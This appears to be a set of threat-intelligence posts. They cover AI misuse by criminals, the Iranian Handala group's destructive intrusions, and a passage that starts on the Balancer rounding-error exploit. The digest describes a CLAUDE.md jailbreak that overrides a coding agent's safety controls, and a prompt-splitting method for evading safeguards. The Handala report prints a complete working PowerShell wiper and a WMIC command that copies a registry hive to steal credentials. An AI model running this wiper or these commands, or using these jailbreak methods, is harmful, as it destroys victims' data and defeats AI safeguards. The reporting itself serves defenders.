
AI Threat Landscape Digest January-February 2026

KEY FINDINGS

AI-assisted malware development has reached operational maturity.
The VoidLink framework, a modular, professionally engineered, and fully functional toolkit, was built by a single developer using a commercial AI-powered IDE within a compressed timeframe. AI-assisted development is no longer experimental; it produces deployment-ready output.

AI-assisted development is not always obvious from the final product.
VoidLink was initially assessed as the work of a coordinated team based on its architecture and implementation quality. The development method was exposed not from analyzing the malware but through an operational security failure. AI-assisted development should be considered a possibility from the outset, not as an afterthought.

Adoption of self-hosted, open-source AI models is growing but still limited in practice.
Actors of varying skill levels are investing in self-hosted and unrestricted models to avoid commercial platform restrictions. However, underground discussions consistently reveal a gap between aspiration and capability: local models still underperform, fine-tuning remains aspirational, and commercial models remain the productive choice even for actors with explicit malicious intent.

Jailbreaking is shifting from direct prompt engineering toward agentic-architecture abuse.
Traditional copy-paste jailbreaks are increasingly ineffective. The misuse of AI agent configuration mechanisms, specifically project files that redefine agent behavior, is a more significant development, as it represents a qualitative shift from manipulating a model's responses to abusing its operational architecture.

AI is showing early signs of deployment as a real-time operational component.
Beyond its use as a development aid, AI is beginning to appear as a live element in offensive workflows, with autonomous agents performing security research tasks and LLMs classifying and engaging targets at scale within automated pipelines.

Enterprise AI adoption is itself an expanding attack surface.
GenAI activity across enterprise networks shows that one in every 31 prompts risked sensitive data leakage, impacting 90% of GenAI-adopting organizations.

INTRODUCTION

During January-February 2026, cyber crime ecosystems continued to adopt AI in a widespread but uneven pattern. Throughout 2025, legitimate software development began shifting from prompt-based AI assistance to agent-based development. Tools such as Cursor, GitHub Copilot, Claude Code, and TRAE introduced a common paradigm: developers write structured specifications in markdown files, and AI agents autonomously implement, test, and iterate code based on those instructions. This agentic model, in which markdown is the operative control layer, is now starting to appear across the threat landscape.
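To make this paradigm concrete, a specification file of the kind these agentic tools consume might look like the following. This is a hypothetical illustration written for this digest; the module name, headings, and criteria are our own invention, not material recovered from any actor:

```markdown
# Module: log-collector

## Goal
Collect application logs from /var/log/app and ship them to the backend API.

## Constraints
- Language: Go, standard library only
- Every sprint must produce working, testable code

## Acceptance criteria
- [ ] Reads rotated logs without duplication
- [ ] Retries failed uploads with exponential backoff
```

An agent such as Cursor or Claude Code treats a file like this as its work order, implementing and iterating until the acceptance criteria are met.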


The critical differentiator in what we observed is AI methodology combined with domain expertise. Across cyber crime forums, the dominant pattern of AI use remains unstructured prompting: actors request malware or exploit code from AI models as if entering a query in a search engine. VoidLink (detailed below), on the other hand, is the first documented case of AI producing truly advanced, deployment-ready malware. The developer combined deep security knowledge with a disciplined, spec-driven workflow to produce results indistinguishable from professional team-based engineering. Forum activity, which constitutes the bulk of observable evidence, primarily consists of actors who have not yet adopted structured AI workflows and whose efforts remain relatively unsophisticated. The more capable actors, those who combine domain expertise with disciplined AI methodology, leave far fewer traces in open forums, making the true scope of this shift harder to measure.

VOIDLINK: THE STANDARD WE MEASURE AGAINST

In January 2026, Check Point Research (CPR) exposed VoidLink, a Linux-based malware framework featuring modular command-and-control (C2) architecture, eBPF and LKM rootkits, cloud and container enumeration, and more than 30 post-exploitation plugins. The framework is highly sophisticated and professionally engineered, so much so that the initial assessment was that VoidLink was likely the product of a coordinated, multi-person development effort conducted over months of intensive development.


Operational security (OPSEC) failures by the developer later exposed internal development artifacts that told a different story. These materials revealed that VoidLink was authored by a single developer using TRAE SOLO, the paid tier of ByteDance’s commercial AI-powered IDE. Instead of unstructured prompting, the developer used Spec Driven Development (SDD), a disciplined engineering workflow, to first define the project goals and constraints, and then use an AI agent to generate a comprehensive architecture and development plan across three virtual teams (Core, Arsenal, and Backend). The resulting plan included sprint schedules, feature breakdowns, coding standards, and acceptance criteria, all documented as structured markdown files. The AI agent implemented the framework sprint by sprint, with each sprint producing working, testable code. The developer acted as product owner, directing, reviewing, and refining, while the AI agent did the actual work.


The results were striking. The recovered source code aligned so closely with the specification documents that it left little doubt that the codebase was written to those exact instructions. What normally would have been a 30-week engineering effort across three teams was executed in under a week, producing over 88,000 lines of functional code. VoidLink reached its first functional implant around December 4, 2025, one week after development began.

THIS CASE ESTABLISHES TWO PRINCIPLES:

  • AI-assisted development now produces operationally viable, deployment-ready malware: it has crossed the threshold from experimental to functional.
  • The AI involvement was invisible until it was exposed by an unrelated OPSEC failure. For analysts and defenders, this means AI involvement in malware development should be treated as a default working assumption, even when there are no visible indicators.

The ramifications of VoidLink’s methodology go beyond this individual case. Its workflow, in which structured markdown specifications direct an AI agent to autonomously implement, test, and iterate, is the same paradigm that defined the agentic AI revolution in legitimate software development throughout 2025. The cyber crime ecosystem is not developing its own AI capability. It is adopting the same tools and architectural patterns as legitimate technology, with the additional goal of trying to overcome the protective limitations built into these systems. This is more important than which model or platform the attackers use.

The same architectural pattern repeatedly appears across the cases highlighted in our report: markdown skill files that transform a coding agent into an autonomous offensive security operator, and configuration files abused to override agent safety controls. In each case, the operative control layer is not code but structured documentation that determines what the AI agents build, how they behave, and what constraints they observe or ignore. This is in direct contrast to the underground forum activity, where the dominant approach remains unstructured prompting.

MODELS: COMMERCIAL, SELF-HOSTED, AND INFORMAL SERVICES

SELF-HOSTED OPEN-SOURCE MODELS

Across cyber crime forums, actors at all skill levels are actively exploring self-hosted, open-source AI models as alternatives to commercial platforms. Their motivations are consistent: to avoid moderation, prevent account bans, and maintain operational privacy.

Users with malware and hacking backgrounds are installing uncensored model variants such as wizardlm-33b-v1.0-uncensored and openhermes-2.5-mistral, and prompting them with comprehensive malicious wishlists spanning ransomware, keyloggers, phishing kits, and exploit code.

Figure 1 – User installing local LLM variants and prompting them to generate malware and fraud tooling.

More established actors are conducting structured cost-benefit analyses, evaluating not only hardware requirements and GPU costs but whether locally hosted models produce reliable output (or hallucinate to the point of being operationally useless), and whether AI-generated malware meets the quality bar of current evasion techniques.

Figure 2 – Threat actor inquiry into hardware, cost, and feasibility of running a fully “unrestricted” locally hosted model.

SELF-HOSTED MODELS: LIMITATIONS IN PRACTICE

Self-hosted models consistently show a gap between aspiration and capability. Community advice on improving local model output focuses on basic optimizations, such as switching to English-language prompts and increasing quantization levels, while references to more advanced techniques such as LoRA fine-tuning remain aspirational rather than operational.

Figure 3 – Community feedback suggesting alternative local models and highlighting token/context limitations of smaller deployments.

Cost estimates range from $5,000 to $50,000 depending on the desired performance, with training timelines of 3–12 months and frank admissions that models “hallucinate a lot” without extensive investment.

Figure 4 – Discussion on cost and requirements for locally hosted unrestricted models.

Most tellingly, an active offensive tools vendor, advertising C2 setups, EDR bypass services, and red team tooling, concluded that local deployment is currently “more of a burden than something productive,” while acknowledging that commercial models remain useful despite increasing restrictions.

Figure 5 – Participants comparing commercial AI systems with alternative models and discussing perceived restriction levels.

COMMERCIAL PLATFORMS AND INFORMAL ACCESS SHARING

Rather than migrating to self-hosted infrastructure, users are comparing the workarounds that prevail across commercial models. Participants recommended specific providers they view as less restrictive, shared experiences with account enforcement on multiple platforms, and refined prompt-splitting techniques to incrementally bypass safeguards, such as requesting explanations before progressing toward executable code.

Figure 6 – Example of the structured prompt-splitting technique suggested to incrementally bypass AI safety restrictions.

Some early signs of informal access sharing have been observed, with operators of local models offering to generate restricted outputs for others on request. However, given the historical precedent of “dark LLM” services that largely failed to deliver on their promises, it remains to be seen whether these will develop into durable service models.

Figure 7 – Community member offering private generation of restricted output via locally hosted model infrastructure.

JAILBREAKING AS ARCHITECTURAL ABUSE

Traditional jailbreaking, the practice of circulating copy-paste prompts designed to trick models into producing restricted output, is becoming increasingly difficult to use effectively. In some forum discussions, users seeking Claude jailbreaks were told that easy public prompts are no longer available, that platforms have been cracking down on abusers, that dedicated subreddits have been banned, and that developing new jailbreaks is costly because the accounts involved are eventually terminated. Single-prompt jailbreaking is becoming less attractive as model providers invest in safety enforcement.

Figure 8 – Forum discussion highlighting the declining availability of easy public jailbreak prompts.

ABUSING AGENT ARCHITECTURE

A more significant development is the emergence of jailbreaking techniques that target the architecture of AI agent systems rather than the model’s conversational safeguards. A packaged “Claude Code Jailbreak” distributed on forums illustrates this shift.

Claude Code is designed to read a CLAUDE.md file from a project’s root directory as configuration. Legitimate developers use this mechanism to define the project context, coding standards, and agent behavior. The jailbreak abuses this by placing override instructions in the CLAUDE.md file that suppress safety controls and redefine the agent’s role. When Claude Code initializes in the directory, it reads these instructions as authoritative project configuration and follows them. The screenshots below claim successful generation of a RAT (Remote Access Trojan) using this method.
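For contrast, the legitimate use of this mechanism looks roughly like the following benign, hypothetical CLAUDE.md (the project name and rules are invented for illustration). The jailbreak works by replacing exactly this kind of content with instructions that redefine the agent's role and suppress its safeguards:

```markdown
# Project: payments-service

## Coding standards
- TypeScript, strict mode; no `any`
- All new endpoints require unit tests

## Agent behavior
- Ask before modifying database migration files
- Never commit directly to the main branch
```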

Figure 9 – Packaged Claude Code jailbreak exploiting the CLAUDE.md project configuration mechanism.
Figure 10 – Alleged jailbreak output showing generation of remote access malware code.

This is not prompt injection in the traditional sense, but manipulation of the agent’s instruction hierarchy, the same architecture used for agentic AI tools in legitimate development. The CLAUDE.md file occupies the same functional role as VoidLink’s markdown specification files or RAPTOR’s skill definitions: a structured document that determines what the agent does, how it behaves, and what constraints it observes.

FROM DEVELOPMENT TOOL TO OPERATIONAL AGENT

The preceding sections document AI as a development aid (as seen in VoidLink), as a resource actors struggle to access on their own terms (self-hosted models), and as a system whose restrictions they attempt to bypass (jailbreaking). This section examines AI deployed as a real-time operational component, performing offensive tasks autonomously within live workflows.

RAPTOR: AGENT-BASED OFFENSIVE ARCHITECTURE VIA MARKDOWN SKILLS

RAPTOR is a legitimate, open-source security research framework created by established security researchers and published on GitHub under an MIT license. It is not malicious tooling. Its significance for threat intelligence lies in its architectural pattern and in the documented attention it is receiving from criminal communities.

RAPTOR transforms Claude Code into an autonomous offensive security agent through a set of markdown skill files and agent definitions. The framework integrates static analysis, fuzzing, exploit generation, and vulnerability triage into an agentic pipeline orchestrated entirely through structured markdown instructions, with no compiled tooling required. In its most explicit form, it demonstrates what the agentic paradigm makes possible: a set of text files that turn a general‑purpose coding agent into a specialized offensive security operator.

Figure 11 – RAPTOR documentation highlighting offensive security agent capabilities and exploit generation benchmarks across LLM providers.

RAPTOR’s own benchmarks add a data point to the commercial versus self-hosted question we discussed earlier. An evaluation of exploit generation across multiple model providers found that commercial frontier models (Anthropic Claude, OpenAI GPT-4, and Google Gemini) consistently produce compilable C code at approximately $0.03 per vulnerability, while locally hosted models via Ollama were marked as “often broken” and unreliable for exploit generation. This reinforces the conclusion reached independently by experienced actors in underground forums: commercial models remain significantly more capable than self-hosted alternatives for operational tasks.

Figure 12 – Forum post sharing RAPTOR as an autonomous offensive and defensive security framework built on Claude Code.

Discussions on criminal forums indicate that threat actors are aware of this architecture. The combination of a proven architectural pattern, open source availability, and documented criminal interest suggests that similar configurations, whether directly based on RAPTOR or just replicating its approach, are likely being developed and tested privately.

AI AS ATTACK SURFACE: ENTERPRISE EXPOSURE

The preceding sections document how threat actors engage with AI as an offensive tool. But the same wave of AI adoption is simultaneously creating exposure from the defensive side. As enterprises integrate generative AI into daily workflows, the volume of sensitive data flowing through these tools introduces a distinct category of risk: instead of AI weaponized against organizations, AI is adopted by organizations in ways that outpace security controls.

In January-February 2026, corporate use of generative AI tools continued to expand at scale. Analysis of GenAI activity across enterprise networks shows that one in every 31 prompts (approximately 3.2%) posed a high risk of sensitive data leakage, including the potential sharing of confidential business information, regulated data, source code, or other sensitive corporate content with external GenAI services.

Critically, this risk is broadly distributed across the enterprise landscape rather than limited to a small number of outliers. High-risk prompt activity impacted 90% of organizations that use GenAI tools on a regular basis, indicating that nearly all GenAI-adopting enterprises encounter meaningful data leakage risk through everyday AI usage. Beyond these clearly high-risk events, 16% of prompts contained potentially sensitive information, reflecting a wider pattern of questionable data-handling behavior that can still translate into compliance exposure or IP loss.
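The two headline ratios are easy to sanity-check (a trivial sketch; the underlying telemetry itself is not reproduced here):

```python
# One high-risk prompt in every 31 corresponds to roughly 3.2%.
high_risk_rate = 1 / 31
print(round(high_risk_rate * 100, 1))  # -> 3.2

# Combined with the 16% "potentially sensitive" figure, roughly one
# prompt in five carries some degree of data-handling risk.
print(round(high_risk_rate + 0.16, 2))  # -> 0.19
```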

Adoption trends further amplify the challenge. Over the last couple of months, organizations used 10 different GenAI tools on average, reflecting multi-tool environments. At the user level, an average employee generated 69 GenAI prompts per month. As prompt volume grows, the possibility of data exposure events scales accordingly, reinforcing the need for security policies, visibility, and real-time prevention controls.

The post AI Threat Landscape Digest January-February 2026 appeared first on Check Point Research.

“Handala Hack” – Unveiling Group’s Modus Operandi

Key Findings

  • Handala Hack is an online persona operated by Void Manticore (aka Red Sandstorm, Banished Kitten), an actor affiliated with the Iranian Ministry of Intelligence and Security (MOIS)
  • Additional personas associated with this actor include Karma and Homeland Justice, which have been used in targeted operations against Israel and Albania
  • Handala continues to rely on longstanding TTPs, primarily conducting quick, hands-on activity within victim networks and employing multiple wiping methods simultaneously
  • In parallel, some newly observed TTPs include the deployment of NetBird to tunnel traffic into the network, as well as the use of an AI-assisted PowerShell script for wiping activity

Introduction

Handala Hack, also tracked by Check Point Research as Void Manticore, is an Iranian threat actor known for multiple destructive wiping attacks combined with “hack and leak” operations. The threat actor operates several online personas. The most prominent are Homeland Justice, maintained since mid-2022 and used in multiple attacks against government, telecom, and other sectors in Albania, and Handala Hack, which has been responsible for multiple intrusions in Israel and has recently expanded its targeting to US-based enterprises such as medical technology giant Stryker.

The tactics, techniques, and procedures (TTPs) associated with Void Manticore intrusions remained largely consistent from 2024 through 2026, as the group continued to rely primarily on manual, hands-on operations, off-the-shelf wipers, and publicly available deletion and encryption tools. Accordingly, our previous research on the actor, published in early 2025, remains highly relevant to understanding their activity. Void Manticore has historically used both custom-built and publicly available tools, while also relying on underground criminal services to obtain initial access and malware.

As the group’s operations expanded in scope, with recent attacks targeting U.S. organizations, we decided to share our observations on this cluster’s activity, with a particular focus on recent TTPs and newly identified indicators. Because the group operates primarily through manual, hands-on activity, its indicators tend to be short-lived and consist largely of commercial VPN services, open-source software, and publicly available offensive security tools.

Background

“Handala Hack” is an online persona operated by Void Manticore (Red Sandstorm, Banished Kitten), a MOIS-affiliated threat actor, and appears to draw its name and imagery from the Palestinian cartoon character Handala. The persona has been used extensively since late 2023 and represents one of the group’s three primary operational fronts. The other two are Karma, which was likely completely replaced by Handala, and Homeland Justice, a persona the group continues to use in operations targeting Albania.

Logos of Void Manticore personas (from left to right): Homeland Justice, Handala and Karma.
Figure 1 – Logos of Void Manticore personas (from left to right): Homeland Justice, Handala and Karma.

Based on our observations, intrusions linked to all three personas exhibit highly similar TTPs, as well as code overlaps in the wipers they deploy. Another distinctive characteristic shared by Karma and Homeland Justice is the collaboration with Scarred Manticore, a separate Iranian threat actor. In the case of Handala and Karma, we have also observed incidents in which the victim-facing group (i.e., messaging within the wipers, notes left in a compromised environment) was presented as Karma, while the stolen data was ultimately leaked through Handala.

Operational interconnections of Void Manticore
Figure 2 – Operational interconnections of Void Manticore

One possible explanation is that Karma and Handala initially represented two separate teams or operational efforts within the same organization, but later converged under a single brand. This would be consistent with Karma’s complete disappearance and Handala’s emergence as the dominant public-facing persona.

According to public reporting, Void Manticore overlaps with activity linked to the MOIS Internal Security Deputy, particularly its Counter-Terrorism (CT) Division, operating under the supervision of Seyed Yahya Hosseini Panjaki. Panjaki was reportedly killed in the opening phase of Israel’s strikes on Iran in early March 2026.

Initial Access

Supply Chain Attacks

Handala has consistently targeted IT and service providers in an effort to obtain credentials, relying largely on compromised VPN accounts for initial access. Over recent months, we identified hundreds of logon and brute-force attempts against organizational VPN infrastructure, linked to Handala-associated infrastructure. This activity typically originates from commercial VPN nodes and is frequently tied to default hostnames in the format DESKTOP-XXXXXX or WIN-XXXXXX.

After the internet shutdown in Iran in January, we observed similar activity originating from Starlink IP ranges, and it has continued since. This has occurred in parallel with a decline in the actor’s operational security, as the group has also begun connecting directly to victims from Iranian IP addresses.

Previously, the adversary generally maintained stronger operational discipline, typically egressing through the commercial VPN segment 169.150.227.X while operating against targets in Israel. In some cases, however, the VPN connection failed, exposing communications from Iranian IP addresses or from a virtual private server. Since the start of the war, the actor has struggled to maintain this level of operational security. At times, it successfully egressed through an Israeli node, 146.185.219[.]235, assessed to be linked to a VPN service, although this differed from the segment previously used.

Activity Before Impact

In a recent intrusion attributed to Handala, initial access is believed to have been established well before the destructive phase, with network access dating back several months. This earlier activity likely provided the group with persistent access and the Domain Administrator credentials required to carry out the attack. In the hours leading up to the destructive activity, Handala appeared to validate its access and test authentication using the compromised credentials.

It is unclear whether this activity is directly associated with Handala, as it slightly differs from their typical TTPs. The actor disabled Windows Defender protections and executed multiple reconnaissance and credential-theft operations. Shortly afterwards, the attacker attempted to retrieve an additional payload from a dedicated command-and-control server (107.189.19[.]52).

The adversary then proceeded with credential extraction using multiple techniques. These included dumping the LSASS process using comsvcs.dll via rundll32.exe, as well as exporting sensitive registry hives such as HKLM. In parallel, the attacker executed ADRecon (named dra.ps1), a PowerShell-based reconnaissance framework used to enumerate Active Directory environments. At this point, the actor likely obtained the Domain Admin credentials later used in Handala’s wiping attack.

wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public"

Lateral Movement

Handala is known to operate primarily in a manual, hands-on manner, with lateral movement conducted largely through extensive use of RDP to move between systems within a compromised environment. To reach hosts that were not directly accessible from outside the network, the group was observed deploying NetBird, a platform designed to create secure, private zero-trust mesh networks.

The deployment of NetBird was performed manually. The attackers first connected to compromised hosts via RDP and then used the local web browser to download the software directly from the official NetBird website.

By installing NetBird on multiple machines within the environment, the attackers were able to establish internal connectivity between systems and operate more efficiently. This approach enabled them to accelerate destructive activity while maintaining control of the operation from multiple footholds inside the network. During the incident, we observed at least five distinct attacker-controlled machines operating simultaneously within the environment.

Wiping Operations

During the destructive phase of the attack, we observed the group deploying four distinct wiping techniques in parallel, likely to maximize impact and inflict the greatest possible damage. To further increase the effect, the threat actor used Group Policy to distribute the different wipers across the network.

Handala Wiper

The first stage involved the deployment of a custom wiper, referred to as Handala Wiper (in some instances named handala.exe).

The wiper was distributed across the network as a scheduled task using Group Policy logon scripts, which executed a batch file named handala.bat. This script simply triggered the execution of two wiper components – the executable and the PowerShell script. Notably, the executable itself was launched remotely from the Domain Controller (DC) and was not written to disk on the affected machines. The malware overwrites file contents across the system and additionally leverages MBR-based wiping techniques to corrupt or destroy files on the system, contributing to significant data loss.

Figure 3 – Wiper execution of Handala Wiper

Handala PowerShell Wiper

As a final stage of the destructive operation, the attackers deployed an additional custom PowerShell-based wiper. Similar to the previous component, this script was also distributed through Group Policy logon scripts, allowing it to propagate across multiple systems within the network.

The PowerShell wiper performs a straightforward but effective operation: it enumerates all files within user directories under C:\Users and deletes them, further compounding the damage caused by the initial wiping activity. It then repeatedly copies an archive from the domain’s SYSVOL share into C:\users, renamed as numbered .gif files, until the drive’s free space is exhausted. Based on the code structure and the detailed comments, it is likely that this PowerShell script was developed with AI assistance.

$usersFolder = "C:\Users"

# Ensure the folder exists
if (Test-Path $usersFolder) {
    # Get all items in C:\Users, but not the Users folder itself
    $items = Get-ChildItem -Path $usersFolder -Recurse

    # Remove each item (files and subfolders) inside C:\Users
    foreach ($item in $items) {
        try {
            Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
        } catch {
            Write-Host "Could not delete: $($item.FullName)"
        }
    }
}

$sourceFile = "\\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar"
$destinationFolder = "C:\users"

if (!(Test-Path $destinationFolder)) {
    New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}

# Fill the remaining disk space with copies of the archive, renamed as .gif files
$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')

$i = 0

while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
    Copy-Item $sourceFile "$destinationFolder\Handala_$i.gif"
    $i++
}

Use of Disk Encryption for Destruction

In addition to the custom wiping tools, we observed the attackers attempting to leverage VeraCrypt, a legitimate and widely used disk encryption utility. In this case, the attacker connected to the compromised host via RDP and used the system’s default web browser to download the software directly from the official website. By encrypting the system drives using a legitimate tool, the attackers added an additional layer to the destructive process. This technique not only increases the operational impact but can also complicate recovery efforts, as encrypted disks may remain inaccessible even if other wiping components fail or are only partially successful.

Manual Deletion

In some cases, Handala Hack operators manually delete virtual machines directly from the virtualization platform or files from compromised machines. This straightforward process involves logging in via RDP, selecting all files, and deleting them. We observed this behavior in several incidents, and it is also documented in Handala Hack’s own videos and leaked materials.

Summary

In this report, we detailed the background of the “Handala Hack” persona and its links to Void Manticore, an actor affiliated with Iran’s Ministry of Intelligence and Security (MOIS). Handala is not the only persona maintained by this actor, which operates several fronts in campaigns targeting the United States, Israel, and Albania.

Like many destructive threat actors, Handala relies on relatively simple TTPs, largely aiming for quick, opportunistic wins through hands-on operations against its targets. These activities include gaining initial access through compromised credentials, moving laterally via RDP and basic tunneling tools, and deploying wipers alongside manual destructive actions. Their modus operandi has not shifted significantly, and strengthening defenses against these techniques remains an effective way to counter this threat.

Recommendations for Defenders

  • Enforce multi-factor authentication, especially for remote access and privileged accounts
  • Monitor for the use of compromised credentials and suspicious authentication activity, with an emphasis on the following:
    • Logins from countries not previously observed for your organization or specific users
    • Unusual access patterns, including:
      • First-time logins outside typical hours
      • Multiple failed logins followed by success
      • New device registrations
      • Unusual data transfer volumes during VPN sessions
      • Authentication from new ASN/hosting providers
  • Restrict access from high-risk geographies and infrastructure:
    • Block inbound connections from Iran at the perimeter and on remote access services (VPN/SSO), unless there is a verified business need
    • Block or tightly restrict Starlink IP ranges, given observed abuse in Iranian actor operations
    • If full blocking is not feasible, implement conditional access controls, increased authentication requirements, and enhanced monitoring for these ranges
  • Consider temporarily tightening remote access policies. If operationally possible, restrict VPN connectivity to business-related countries only, with exceptions approved based on business need (e.g., whitelisted users/locations, dedicated jump hosts, or managed devices only)
  • Restrict and harden RDP access across the environment; disable it where not operationally required. Actively search for RDP access from machines with the default Windows naming conventions (e.g., DESKTOP-XXXXXX or WIN-XXXXXXXX), especially outside of working hours
  • Monitor for the use of potentially unwanted software, including remote management and monitoring (RMM) tools, VPN applications such as NetBird, and tunneling utilities such as SSH for Windows
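As a rough illustration of the RDP hunting guidance above, the following Python sketch flags logon events from default-named Windows machines outside working hours. The event fields and the 08:00-18:00 window are assumptions for the example, not a real SIEM schema:

```python
import re
from datetime import time

# Default Windows machine names: DESKTOP- plus 7 chars, WIN- plus 11 chars
DEFAULT_NAME = re.compile(r"^(DESKTOP-[A-Z0-9]{7}|WIN-[A-Z0-9]{11})$")

def is_suspicious_rdp(event: dict) -> bool:
    # Flag RDP logons from default-named workstations outside 08:00-18:00
    name_hit = bool(DEFAULT_NAME.match(event["workstation"]))
    t = event["logon_time"]
    off_hours = t < time(8) or t >= time(18)
    return name_hit and off_hours

# Illustrative events; only the default-named, off-hours logon is flagged
events = [
    {"workstation": "DESKTOP-FK1NPHF", "logon_time": time(2, 30)},
    {"workstation": "FIN-LAPTOP-01", "logon_time": time(3, 0)},
    {"workstation": "DESKTOP-FK1NPHF", "logon_time": time(10, 0)},
]
flagged = [e for e in events if is_suspicious_rdp(e)]
```

In production this logic would run over Windows Security Event Log 4624 (logon type 10) or VPN/RDP gateway telemetry rather than an in-memory list.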

IOCs

Type | IOC
Handala Wiper | 5986ab04dd6b3d259935249741d3eff2
Handala PowerShell Wiper | 3cb9dea916432ffb8784ac36d1f2d3cd
VeraCrypt Installer | 3236facc7a30df4ba4e57fddfba41ec5
NetBird Installer | 3dfb151d082df7937b01e2bb6030fe4a
NetBird | e035c858c1969cffc1a4978b86e90a30
Handala VPS | 82.25.35[.]25
Handala VPS | 31.57.35[.]223
Handala VPS | 107.189.19[.]52
VPN exit node used by Handala | 146.185.219[.]235
Starlink IP range used by Handala | 188.92.255.X
Starlink IP range used by Handala | 209.198.131.X
Commercial VPN IP range used by Handala | 149.88.26.X
Commercial VPN IP range used by Handala | 169.150.227.X
Handala Machine Names
WIN-P1B7V100IIS
DESKTOP-FK1NPHF
DESKTOP-R1FMLQP
WIN-DS6S0HEU0CA
DESKTOP-T3SOB36
WIN-GPPA5GI4QQJ
VULTR-GUEST
DESKTOP-HU45M79
DESKTOP-TNFP4JF
DESKTOP-14O69KQ
DESKTOP-9KG46L1
DESKTOP-G2MH4KD

MITRE ATT&CK Breakdown

ATT&CK Tactic | Technique | Observed Activity
Initial Access | T1133 – External Remote Services | Use of compromised VPN access for entry into victim environments.
Initial Access | T1078.002 – Valid Accounts: Domain Accounts | Use of stolen/supplied credentials, including Domain Admin credentials.
Initial Access | T1199 – Trusted Relationship | Targeting of IT and service providers.
Credential Access | T1110 – Brute Force | Repeated logon and brute-force attempts against VPN infrastructure.
Credential Access | T1003.001 – OS Credential Dumping: LSASS Memory | LSASS dumping via rundll32 and comsvcs.dll.
Credential Access | T1003.002 – OS Credential Dumping: Security Account Manager | Export of sensitive registry hives for credential extraction.
Discovery | T1087.002 – Account Discovery: Domain Account | ADRecon used to enumerate the Active Directory environment.
Lateral Movement | T1021.001 – Remote Services: Remote Desktop Protocol | Extensive hands-on lateral movement over RDP.
Command and Control | T1572 – Protocol Tunneling | NetBird used to tunnel traffic and reach internal hosts.
Execution | T1105 – Ingress Tool Transfer | NetBird and VeraCrypt downloaded directly onto victim systems.
Execution | T1047 – Windows Management Instrumentation | WMIC was used to run commands.
Execution / Persistence | T1484.001 – Group Policy Modification | Wipers distributed via GPO.
Execution / Persistence | T1037.003 – Network Logon Script | Logon scripts used to trigger destructive components.
Execution | T1053.005 – Scheduled Task | Handala wiper launched as a scheduled task.
Execution | T1059.001 – PowerShell | AI-assisted PowerShell wiper used for destructive activity.
Impact | T1561.002 – Disk Structure Wipe | MBR-based wiping by the custom Handala wiper.
Impact | T1485 – Data Destruction | File deletion, manual deletion, and destructive cleanup.
Impact | T1486 – Data Encrypted for Impact | VeraCrypt used to encrypt disks as part of the attack.

The post “Handala Hack” – Unveiling Group’s Modus Operandi appeared first on Check Point Research.

How an Attacker Drained $128M from Balancer Through Rounding Error Exploitation

By: Dikla Barda, Roaman Zaikin & Oded Vanunu 

On November 3, 2025, Check Point Research’s blockchain monitoring systems detected a sophisticated exploit targeting Balancer V2’s ComposableStablePool contracts. The attacker exploited arithmetic precision loss in pool invariant calculations to drain $128.64 million across six blockchain networks in under 30 minutes.

The attack leveraged a rounding error vulnerability in the _upscaleArray function that, when combined with carefully crafted batchSwap operations, allowed the attacker to artificially suppress BPT (Balancer Pool Token) prices and extract value through repeated arbitrage cycles. The exploitation occurred primarily during attacker smart contract deployment, with the constructor executing 65+ micro-swaps that compounded precision loss to devastating effect.


Introduction

In the early morning hours of November 3, 2025, Check Point’s Blockchain Threat Analysis system flagged unusual activity on the Ethereum mainnet involving Balancer’s V2 Vault contract. Within minutes, our automated detection identified a critical exploit in progress, with massive fund outflows from multiple liquidity pools.

Balancer V2

The attack exploited a mathematical vulnerability in how Balancer’s ComposableStablePools handle small-value swaps. When token balances are pushed to specific rounding boundaries (8-9 wei range), Solidity’s integer division causes significant precision loss. The attacker weaponized this by executing batched swap sequences that accumulated these tiny errors into catastrophic invariant manipulation.


Background: Balancer V2 Architecture

The Vault System

Balancer V2 uses a centralized “Vault” contract (0xBA12222222228d8Ba445958a75a0704d566BF2C8) that holds all tokens across all pools, separating token storage from pool logic to reduce gas costs and enable capital efficiency. This shared liquidity design meant a single vulnerability in pool math could affect all ComposableStablePools simultaneously—exactly what happened in this attack.

Internal Balance Mechanism

Balancer V2’s Internal Balance system allows users to deposit tokens once and use them across multiple operations without repeated ERC20 transfers:

mapping(address => mapping(IERC20 => uint256)) private _internalTokenBalance;

This system became critical to the attack. The exploit contract accumulated stolen funds in its internal balance during deployment, then withdrew them to the final recipient address in subsequent transactions.


The Vulnerability: Arithmetic Precision Loss in Stable Pool Math

The Root Cause

ComposableStablePools use Curve’s StableSwap invariant formula to maintain price stability between similar assets. The invariant D represents total pool value, and BPT price is calculated as D divided by totalSupply. However, the scaling operations that prepare balances for invariant calculations introduce rounding errors.

Vulnerable Code Path:

function _upscaleArray(uint256[] memory amounts, uint256[] memory scalingFactors) 
    private pure returns (uint256[] memory) {
    
    for (uint256 i = 0; i < amounts.length; i++) {
        amounts[i] = FixedPoint.mulDown(amounts[i], scalingFactors[i]);
    }
    return amounts;
}
// Simplified representation - actual implementation is more complex
function _calculateInvariant(uint256[] memory balances) private pure returns (uint256) {
    uint256[] memory scaledBalances = _upscaleArray(balances, scalingFactors);
    uint256 invariant = computeStableInvariant(scaledBalances, amplificationParameter);
    return invariant;
}

The mulDown function performs integer division that rounds down. When balances are small (8-9 wei range), this rounding creates significant relative errors—up to 10% precision loss per operation.
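The effect of mulDown at the wei boundary can be reproduced with plain integer arithmetic. The scaling factor below is a hypothetical rate of ~1.09, chosen only to make the rounding visible; it is not a value taken from the affected pools:

```python
ONE = 10**18  # Balancer's FixedPoint library works in 18-decimal fixed point

def mul_down(a: int, b: int) -> int:
    # Mirrors FixedPoint.mulDown: multiply, then floor-divide (rounds down)
    return a * b // ONE

# Hypothetical scaling factor for a rate-providing token (rate ~1.09)
factor = 109 * ONE // 100

for balance in (8, 9, 10**18):
    scaled = mul_down(balance, factor)
    exact = balance * factor / ONE
    loss = (exact - scaled) / exact
    print(f"balance={balance}: scaled={scaled}, relative loss={loss:.2%}")
```

At 8-9 wei the floor-division error is a large fraction of the balance itself (around 8% with this rate), while at normal balances the same operation loses effectively nothing.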

